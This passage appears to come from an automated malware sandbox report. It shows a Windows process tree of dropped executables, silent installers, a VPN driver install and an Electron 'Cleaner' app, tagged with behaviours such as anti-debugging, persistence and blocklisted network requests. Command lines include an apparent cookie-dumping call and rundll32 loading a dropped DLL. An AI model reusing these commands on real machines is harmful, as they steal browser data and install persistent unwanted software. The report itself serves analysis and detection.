                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4220 -s 900
                                                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                                                    • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                    PID:7244
                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\mAVU0g4L7oy6B6xhGlscdLqO.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\mAVU0g4L7oy6B6xhGlscdLqO.exe"
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                  PID:4212
                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\VJhLzTuV52LtAJu70NF8c9XH.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\VJhLzTuV52LtAJu70NF8c9XH.exe"
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                  PID:4536
                                                                                                                                                                                                                                                                • C:\Users\Admin\Documents\F0tptP1GBPwoE7wK9h4O1KPt.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\Documents\F0tptP1GBPwoE7wK9h4O1KPt.exe"
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                                                                                                                  • Checks BIOS information in registry
                                                                                                                                                                                                                                                                  • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                  PID:4288
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-65A6T.tmp\VPN.tmp
                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-65A6T.tmp\VPN.tmp" /SL5="$102DE,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                PID:4704
                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\is-2PJML.tmp\Setup.exe
                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-2PJML.tmp\Setup.exe" /silent /subid=720
                                                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                                                    PID:8156
                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-I3BMU.tmp\Setup.tmp
                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-I3BMU.tmp\Setup.tmp" /SL5="$80052,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-2PJML.tmp\Setup.exe" /silent /subid=720
                                                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                                                        PID:7616
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
                                                                                                                                                                                                                                                                          4⤵
                                                                                                                                                                                                                                                                            PID:8076
                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                                                                                                                              tapinstall.exe remove tap0901
                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                              PID:8008
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                              PID:6092
                                                                                                                                                                                                                                                                              • C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
                                                                                                                                                                                                                                                                                tapinstall.exe install OemVista.inf tap0901
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                PID:8976
                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall
                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                              PID:7092
                                                                                                                                                                                                                                                                            • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                                                                                                                                                                                              "C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
                                                                                                                                                                                                                                                                              4⤵
                                                                                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                              PID:1616
                                                                                                                                                                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                                                                                                                                PID:192
                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\11111.exe
                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                          PID:5316
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                          • Modifies registry class
                                                                                                                                                                                                                                                                          PID:6068
                                                                                                                                                                                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                          • Process spawned unexpected child process
                                                                                                                                                                                                                                                                          PID:500
                                                                                                                                                                                                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                                                                                                                                                                                                          C:\Windows\system32\msiexec.exe /V
                                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                                                                                                                          PID:7808
                                                                                                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding DE680E062D609F9F43349E7F95A4C380 C
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                            PID:8080
                                                                                                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding FAB522270A36A03C8E6EE75C56441B58
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                            • Blocklisted process makes network request
                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                            PID:5048
                                                                                                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding EE12CEF1E8EECD0CBBA7C54E778C14B4 C
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                            PID:9164
                                                                                                                                                                                                                                                                          • C:\Windows\syswow64\MsiExec.exe
                                                                                                                                                                                                                                                                            C:\Windows\syswow64\MsiExec.exe -Embedding 82F32C9EDCEBA06FFE4596C9F7179CA3 C
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                            PID:8520
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
                                                                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                                                                                                            PID:8452
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
                                                                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                                                                                PID:8864
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                  • Checks computer location settings
                                                                                                                                                                                                                                                                                  PID:2648
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x1dc,0x1e0,0x1e4,0x84,0x1e8,0x7ff9d5c9dec0,0x7ff9d5c9ded0,0x7ff9d5c9dee0
                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                      PID:4628
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7ff7c7009e70,0x7ff7c7009e80,0x7ff7c7009e90
                                                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                                                          PID:6116
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1648,13766022365672105657,16330453508766025536,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2648_202682025" --mojo-platform-channel-handle=1712 /prefetch:8
                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                          PID:5324
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1648,13766022365672105657,16330453508766025536,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2648_202682025" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1664 /prefetch:2
                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                            PID:3272
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1648,13766022365672105657,16330453508766025536,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2648_202682025" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2600 /prefetch:1
                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                                                                                                            PID:3980
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1648,13766022365672105657,16330453508766025536,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2648_202682025" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2628 /prefetch:1
                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                                            • Adds Run key to start application
                                                                                                                                                                                                                                                                                            PID:8864
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1648,13766022365672105657,16330453508766025536,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2648_202682025" --mojo-platform-channel-handle=2140 /prefetch:8
                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                                            • Checks computer location settings
                                                                                                                                                                                                                                                                                            PID:5144
                                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1648,13766022365672105657,16330453508766025536,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2648_202682025" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3204 /prefetch:2
                                                                                                                                                                                                                                                                                            5⤵
                                                                                                                                                                                                                                                                                              PID:3736
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1648,13766022365672105657,16330453508766025536,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2648_202682025" --mojo-platform-channel-handle=1484 /prefetch:8
                                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                                PID:8780
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1648,13766022365672105657,16330453508766025536,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2648_202682025" --mojo-platform-channel-handle=3204 /prefetch:8
                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                • Suspicious use of SendNotifyMessage
                                                                                                                                                                                                                                                                                                PID:8820
                                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1648,13766022365672105657,16330453508766025536,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2648_202682025" --mojo-platform-channel-handle=3716 /prefetch:8
                                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                                  PID:5396
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1648,13766022365672105657,16330453508766025536,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2648_202682025" --mojo-platform-channel-handle=2144 /prefetch:8
                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                  • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                  PID:7420
                                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
                                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1648,13766022365672105657,16330453508766025536,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2648_202682025" --mojo-platform-channel-handle=3692 /prefetch:8
                                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                                    PID:5536
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_D2AA.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
                                                                                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                                                                                • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                                PID:5276
                                                                                                                                                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                                  4⤵
                                                                                                                                                                                                                                                                                                    PID:7192
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                                                                                                                                                              PID:7112
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                PID:8136
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\ApplicationFrameHost.exe
                                                                                                                                                                                                                                                                                              C:\Windows\system32\ApplicationFrameHost.exe -Embedding
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                                              PID:4484
                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                              PID:4912
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\browser_broker.exe
                                                                                                                                                                                                                                                                                              C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                              PID:8244
                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                                              • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                                                                                                                                              PID:8420
                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                              • Modifies Internet Explorer settings
                                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                                              PID:9188
                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                                              PID:8752
                                                                                                                                                                                                                                                                                            • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                                                                                                                                                                                              "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                              • Modifies registry class
                                                                                                                                                                                                                                                                                              PID:7004
                                                                                                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                              PID:5748
                                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                                PID:8668
                                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\33B0.exe
                                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\33B0.exe
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                              • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                              • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                              PID:5484
                                                                                                                                                                                                                                                                                            • \??\c:\windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                              c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                                              • Drops file in Windows directory
                                                                                                                                                                                                                                                                                              • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                              PID:7160
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                                DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{6fa1eefc-553e-4440-bd06-bd4b9ecfda52}\oemvista.inf" "9" "4d14a44ff" "0000000000000120" "WinSta0\Default" "0000000000000124" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                • Drops file in System32 directory
                                                                                                                                                                                                                                                                                                • Drops file in Windows directory
                                                                                                                                                                                                                                                                                                • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                                • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                                PID:3916
                                                                                                                                                                                                                                                                                              • C:\Windows\system32\DrvInst.exe
                                                                                                                                                                                                                                                                                                DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000138"
                                                                                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                                                                                  PID:7800
                                                                                                                                                                                                                                                                                              • \??\c:\windows\system32\svchost.exe
